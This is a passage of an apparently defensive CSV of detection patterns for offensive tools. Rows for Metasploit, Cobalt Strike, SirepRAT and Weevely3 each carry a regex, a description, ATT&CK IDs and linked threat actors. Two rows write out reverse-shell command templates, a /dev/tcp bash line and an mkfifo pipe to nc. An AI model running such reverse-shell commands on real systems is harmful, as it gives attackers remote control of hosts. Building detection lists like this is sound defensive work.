security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59558" "*single_shell_bind_tcp.asm*",".{0,1000}single_shell_bind_tcp\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59559" "*single_shell_reverse_tcp.asm*",".{0,1000}single_shell_reverse_tcp\.asm.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59560" "*single_target_exploit.rb*",".{0,1000}single_target_exploit\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","59561" "*S-inject\S-inject.cpp*",".{0,1000}S\-inject\\S\-inject\.cpp.{0,1000}","offensive_tool_keyword","S-inject","Windows injection of x86/x64 DLL and Shellcode","T1055 - T1027","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/Joe1sn/S-inject","1","0","N/A","N/A","10","4","313","45","2025-04-06T08:06:39Z","2024-02-05T04:39:10Z","59563" "*sipdump2john.py*",".{0,1000}sipdump2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","59564" "*sipvicious_svcrack* -u100",".{0,1000}sipvicious_svcrack.{0,1000}\s\-u100","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559","TA0043 - TA0002 - TA0004 - TA0011 - TA0003","N/A","Black Basta","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","N/A","10","10","2354","209","2025-04-09T16:56:24Z","2020-03-09T19:12:11Z","59565" "*SirepRAT.py *",".{0,1000}SirepRAT\.py\s.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on 
Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","0","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","59566" "*SirepRAT_RCE_as_SYSTEM_on_Windows_IoT_Core_Slides.pdf*",".{0,1000}SirepRAT_RCE_as_SYSTEM_on_Windows_IoT_Core_Slides\.pdf.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","1","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","59567" "*SirepRAT_RCE_as_SYSTEM_on_Windows_IoT_Core_White_Paper.pdf*",".{0,1000}SirepRAT_RCE_as_SYSTEM_on_Windows_IoT_Core_White_Paper\.pdf.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","1","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","59568" "*SirepRAT-2.0.0.zip*",".{0,1000}SirepRAT\-2\.0\.0\.zip.{0,1000}","offensive_tool_keyword","SirepRAT","RAT tool - Remote Command Execution as SYSTEM on Windows IoT Core","T1059 - T1219 - T1105 - T1021","TA0002 - TA0011 - TA0003","N/A","N/A","C2","https://github.com/SafeBreach-Labs/SirepRAT","1","1","N/A","N/A","7","10","380","89","2020-12-13T09:52:55Z","2019-03-02T19:51:05Z","59569" "*sitadel http://*",".{0,1000}sitadel\shttp\:\/\/.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","59571" "*sitadel 
https://*",".{0,1000}sitadel\shttps\:\/\/.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","59572" "*sitadel.py *",".{0,1000}sitadel\.py\s.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","0","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","59573" "*Sitadel-master.zip*",".{0,1000}Sitadel\-master\.zip.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Reconnaissance","https://github.com/shenril/Sitadel","1","1","N/A","N/A","5","6","577","112","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z","59574" "*site-packages/wfuzz*",".{0,1000}site\-packages\/wfuzz.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","59575" "*-Situational-Awareness-BOF*",".{0,1000}\-Situational\-Awareness\-BOF.{0,1000}","offensive_tool_keyword","cobaltstrike","Situational Awareness commands implemented using Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - 
T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/CS-Situational-Awareness-BOF","1","1","N/A","N/A","10","10","1389","234","2025-03-26T19:36:31Z","2020-07-15T16:21:18Z","59576" "*six2dez/reconftw*",".{0,1000}six2dez\/reconftw.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","1","#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","59577" "*skaffold run -m nemesis *",".{0,1000}skaffold\srun\s\-m\snemesis\s.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - 
T1595 - T1590","TA0042 - TA0043","N/A","Black Basta","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","N/A","9","7","672","65","2025-04-17T21:55:10Z","2023-07-13T18:24:24Z","59578" "*skahwah*wordsmith*",".{0,1000}skahwah.{0,1000}wordsmith.{0,1000}","offensive_tool_keyword","wordsmith","The aim of Wordsmith is to assist with creating tailored wordlists and usernames that are primarilly based on geolocation.","T1210.001 - T1583.001 - T1583.002","TA0007 - ","N/A","N/A","Credential Access","https://github.com/skahwah/wordsmith","1","1","N/A","N/A","N/A","2","167","20","2018-05-03T13:44:01Z","2016-07-06T14:02:51Z","59579" "*skalkoto/winexe*",".{0,1000}skalkoto\/winexe.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","1","#linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","59580" "*skelsec/evilrdp*",".{0,1000}skelsec\/evilrdp.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","Black Basta","C2","https://github.com/skelsec/evilrdp","1","1","N/A","N/A","10","10","299","31","2025-03-15T13:37:21Z","2023-11-29T13:44:58Z","59581" "*skelsec/jackdaw*",".{0,1000}skelsec\/jackdaw.{0,1000}","offensive_tool_keyword","jackdaw","Jackdaw is here to collect all information in your domain. store it in a SQL database and show you nice graphs on how your domain objects interact with each-other an how a potential attacker may exploit these interactions. 
It also comes with a handy feature to help you in a password-cracking project by storing/looking up/reporting hashes/passowrds/users.","T1087 - T1482 - T1201 - T1213 - T1003","TA0007 - TA0008 - TA0009 - TA0006","N/A","N/A","Reconnaissance","https://github.com/skelsec/jackdaw","1","1","N/A","N/A","N/A","6","576","89","2025-03-15T13:37:50Z","2019-03-27T18:36:41Z","59582" "*skelsec/pysnaffler*",".{0,1000}skelsec\/pysnaffler.{0,1000}","offensive_tool_keyword","pysnaffler","This project is a Python version of the well-known Snaffler project. Not a full implementation of that project - only focusing on SMB share/dir/file enumeration and download and parse.","T1083 - T1087 - T1114 - T1518","TA0007 - TA0009 - TA0010","N/A","N/A","Collection","https://github.com/skelsec/pysnaffler","1","1","N/A","N/A","10","1","91","5","2025-03-15T13:46:34Z","2023-11-17T21:52:40Z","59583" "*SkipPasswordAgeCheck*",".{0,1000}SkipPasswordAgeCheck.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59584" "*SkipPortScan*",".{0,1000}SkipPortScan.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - 
Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","1","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","59585" "*sknux/CVE-2021-21985_PoC*",".{0,1000}sknux\/CVE\-2021\-21985_PoC.{0,1000}","offensive_tool_keyword","POC","CVE-2021-21985 POC exploitation","T1190 - T1059.001 - T1040","TA0001 - TA0003 - TA0009","N/A","Dispossessor","Exploitation tool","https://github.com/sknux/CVE-2021-21985_PoC","1","1","N/A","N/A","7","1","3","1","2021-11-09T19:14:55Z","2021-11-09T19:06:29Z","59586" "*skymem-get-mails *",".{0,1000}skymem\-get\-mails\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","59588" "*SkyperTHC/bpf-keylogger*",".{0,1000}SkyperTHC\/bpf\-keylogger.{0,1000}","offensive_tool_keyword","bpf-keylogger","Keylogger written in BPF","T1056.001 - T1053.005","TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/SkyperTHC/bpf-keylogger","1","1","N/A","N/A","10","1","4","1","2024-01-29T18:08:01Z","2024-01-29T09:34:47Z","59589" "*SLACKAES256Handler.*",".{0,1000}SLACKAES256Handler\..{0,1000}","offensive_tool_keyword","Nuages","A modular C2 framework","T1071 - T1090 - T1102 - T1027 - T1571","TA0011 - TA0003 - TA0010","N/A","Dispossessor","C2","https://github.com/p3nt4/Nuages","1","1","N/A","N/A","10","10","455","85","2025-04-10T15:34:19Z","2019-05-12T11:00:35Z","59590" "*slackor.db*",".{0,1000}slackor\.db.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","59591" 
"*Slackor\impacket*",".{0,1000}Slackor\\impacket.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","N/A","10","10","463","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z","59592" "*-slave *",".{0,1000}\-slave\s\s\\s\\s\\s\.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#content","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","59593" "*sleep 1; /bin/bash -c \'${shell} 0&0 2>&0*",".{0,1000}sleep\s1\;\s\/bin\/bash\s\-c\s\\\'\$\{shell\}\s0\<\/dev\/tcp\/\$\{lhost\}\/\$\{port\}\s1\>\&0\s2\>\&0.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","0","#linux","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","59594" "*sleep 1; rm -rf /tmp/f;mkfifo /tmp/f;cat /tmp/f|${shell} -i 2>&1|nc ${lhost} ${port} >/tmp/f*",".{0,1000}sleep\s1\;\srm\s\-rf\s\/tmp\/f\;mkfifo\s\/tmp\/f\;cat\s\/tmp\/f\|\$\{shell\}\s\-i\s2\>\&1\|nc\s\$\{lhost\}\s\$\{port\}\s\>\/tmp\/f.{0,1000}","offensive_tool_keyword","Weevely3","Weevely is a web shell designed for post-exploitation purposes that can be extended over the network at runtime","T1059.003 - T1100 - T1071.001 - T1219 - T1078","TA0002 - TA0003 - TA0005 - TA0011 - 
TA0008","N/A","Sandworm","Resource Development","https://github.com/epinna/weevely3","1","0","N/A","N/A","8","10","3292","612","2024-10-18T04:32:13Z","2014-09-20T10:16:49Z","59595" "*Sleep for * ms* redirect to KrakenMask !*",".{0,1000}Sleep\sfor\s.{0,1000}\sms.{0,1000}\sredirect\sto\sKrakenMask\s!.{0,1000}","offensive_tool_keyword","Jomungand","Shellcode Loader with memory evasion","T1055.012 - T1027.002 - T1564.006","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/RtlDallas/Jomungand","1","0","N/A","N/A","10","","N/A","","","","59596" "*sleep_python_bridge.sleepy*",".{0,1000}sleep_python_bridge\.sleepy.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - 
Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","59597" "*sleep_python_bridge.striker*",".{0,1000}sleep_python_bridge\.striker.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider 
- XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","59598" "*Sleeping for 10 seconds to avoid in-memory AV scan*",".{0,1000}Sleeping\sfor\s10\sseconds\sto\savoid\sin\-memory\sAV\sscan.{0,1000}","offensive_tool_keyword","GlllPowerloader","Sample to bypass AV/EDR and upload to transfer.sh","T1059.001 - T1202 - T1105 - T1027 - T1036 - T1070 - T1031 - T1071 - T1048","TA0005 - TA0004 - TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/INotGreen/GlllPowerloader","1","0","N/A","N/A","10","5","451","105","2024-04-12T07:28:24Z","2022-04-26T12:10:58Z","59599" "*sleepmask.x64.o*",".{0,1000}sleepmask\.x64\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens 
- Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cobalt-Strike/sleep_python_bridge","1","1","N/A","N/A","10","10","184","32","2023-04-12T15:00:48Z","2021-10-12T18:18:48Z","59600" "*sleepmask.x86.o*",".{0,1000}sleepmask\.x86\.o.{0,1000}","offensive_tool_keyword","cobaltstrike","This project is 'bridge' between the sleep and python language. It allows the control of a Cobalt Strike teamserver through python without the need for for the standard GUI client.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang 
